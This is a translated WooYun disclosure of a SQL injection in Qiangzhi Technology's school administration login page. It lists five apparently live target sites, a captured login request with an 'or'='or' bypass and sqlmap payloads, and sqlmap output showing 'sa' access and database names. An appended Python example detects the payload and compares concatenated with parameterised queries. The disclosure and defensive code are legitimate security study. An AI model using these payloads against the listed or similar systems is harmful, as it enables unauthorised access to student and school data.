Vulnerability summary

Defect ID: wooyun-2015-0103191

Title: Qiangzhi Technology (强智科技) educational administration system SQL injection vulnerability

Vendor: qzdatasoft.com

Author: term

Submitted: 2015-03-24 15:28

Fix deadline: 2015-06-27 15:30

Disclosed: 2015-06-27 15:30

Type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: the vendor was notified but ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-03-24: details sent to the vendor, awaiting the vendor's response
2015-03-29: the vendor chose to ignore the vulnerability; details opened to third-party security partners
2015-05-23: details opened to core white hats and experts in the relevant field
2015-06-02: details opened to ordinary white hats
2015-06-12: details opened to trainee white hats
2015-06-27: details opened to the public

Brief description:

Man: "Ask the world what love is, it only..." Woman: a slap across the face, smack! Damn programmers still want a girlfriend; serves you right to die on your code.

Detailed description:

As WooYun requires, five cases!

http://jwxt.hifa.edu.cn/jiaowu/jwxs/login.asp
http://221.232.159.24/dhjw/jwxs/login.asp
http://jiaowu.hustwenhua.net/jwxs/login.asp
http://xscx.cmcedu.cn/jwxs/login.asp
http://jwxt.hycgy.com:5000/jwxs/login.asp


Capture the request while logging in.

[Screenshot: QQ截图20150323134521.png]

[Screenshot: 2.png]


POST /dhjw/jwxs/login.asp HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://221.232.159.24/dhjw/jwxs/login.asp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 221.232.159.24
Content-Length: 108
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: LoginLb=; ASPSESSIONIDCSACRCTD=MMHJDOJDHFEIOOCPPELOLJME
datetime=2015-3-23+13%3A12%3A50&loginNum=&Account=%27or%27%3D%27or%27&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1


[Screenshot: 1.png]

[Screenshot: 123.png]


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: Account
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: datetime=2015-3-23 13:12:50&loginNum=&Account=-2532' OR 7256=CONVERT(INT,(SELECT CHAR(113) CHAR(106) CHAR(112) CHAR(122) CHAR(113) (SELECT (CASE WHEN (7256=7256) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(118) CHAR(113) CHAR(113))) AND 'ogOj'='ogOj&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: datetime=2015-3-23 13:12:50&loginNum=&Account=-4128' OR 4975=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'QvyA'='QvyA&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1
---
[13:47:47] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[13:47:47] [INFO] fetching current user
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] Y
[13:47:49] [INFO] retrieved: sa
current user: 'sa'
[13:47:49] [INFO] fetching current database
[13:47:49] [INFO] retrieved: dhjw
current database: 'dhjw'
[13:47:49] [INFO] fetching database names
[13:47:49] [WARNING] reflective value(s) found and filtering out
[13:47:49] [WARNING] the SQL query provided does not return any output
[13:47:49] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[13:47:49] [INFO] fetching number of databases
[13:47:49] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[13:47:51] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[13:47:52] [ERROR] unable to retrieve the number of databases
[13:47:52] [INFO] retrieved: dhjw
[13:47:52] [INFO] retrieved: master
[13:47:52] [INFO] retrieved: tempdb
[13:47:53] [INFO] retrieved: model
[13:47:53] [INFO] retrieved: msdb
[13:47:53] [INFO] retrieved: ReportServer
[13:47:53] [INFO] retrieved: ReportServerTempDB
[13:47:53] [INFO] retrieved: dhjw
[13:47:54] [INFO] retrieved:
available databases [7]:
[*] dhjw
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[13:47:54] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 23 times
[13:47:54] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\221.232.159.24'
[*] shutting down at 13:47:54

Proof of vulnerability:

[Screenshot: 123.png]

Fix recommendation:

You're the professionals here!

Copyright notice: please credit term@WooYun when reposting.
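The report leaves the remedy to the vendor. The following is an added example, not code from the report or from the qzdatasoft product: it decodes the captured login body, flags the Account value as a quote/OR tautology (a rule usable in a WAF or request-log review), and contrasts a string-concatenated login query with a parameterised one. sqlite3 stands in for the MS SQL Server back end; the users table, its columns and the stored row are assumptions, and the password-field tautology in the demo generalises the report's Account payload.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed copy of the POST body captured in the report; the B1 button value is
# GBK-encoded, so the whole body is decoded with encoding="gbk".
CAPTURED_BODY = ("datetime=2015-3-23+13%3A12%3A50&loginNum=&Account=%27or%27%3D%27or%27"
                 "&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1")

# A quote followed by OR and a tautology, e.g. 'or'='or', ' or ''=', ' or 1=1.
TAUTOLOGY = re.compile(r"'\s*or\s*(?:'[^']*'?\s*=\s*'|\d+\s*=\s*\d+)", re.IGNORECASE)


def decode_form(body: str, encoding: str = "gbk") -> dict:
    """Decode a form-urlencoded body into a {field: value} dict (first value wins)."""
    parsed = parse_qs(body, keep_blank_values=True, encoding=encoding)
    return {k: v[0] for k, v in parsed.items()}


def suspicious_fields(form: dict) -> list:
    """Names of fields whose value looks like a quote/OR tautology."""
    return [k for k, v in form.items() if TAUTOLOGY.search(v)]


def auth_concat(conn: sqlite3.Connection, account: str, password: str) -> bool:
    """Vulnerable pattern (assumed for the ASP page): input spliced into the SQL text,
    so a quote in the input terminates the literal and the rest is parsed as SQL."""
    sql = f"SELECT COUNT(*) FROM users WHERE Account='{account}' AND Password='{password}'"
    return conn.execute(sql).fetchone()[0] > 0


def auth_param(conn: sqlite3.Connection, account: str, password: str) -> bool:
    """Hardened: placeholders keep quotes and OR inside the data, never in the SQL."""
    sql = "SELECT COUNT(*) FROM users WHERE Account=? AND Password=?"
    return conn.execute(sql, (account, password)).fetchone()[0] > 0


def demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the dhjw database with one assumed user row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (Account TEXT, Password TEXT)")
    conn.execute("INSERT INTO users VALUES ('student01', 'correct-horse')")
    return conn


if __name__ == "__main__":
    form = decode_form(CAPTURED_BODY)
    print("suspicious fields:", suspicious_fields(form))          # ['Account']
    conn = demo_db()
    print("concat bypass:", auth_concat(conn, "x", "' or ''='"))  # True
    print("param bypass:", auth_param(conn, "x", "' or ''='"))    # False
```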


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2015-06-27 15:30

Vendor reply:

Latest status:

None yet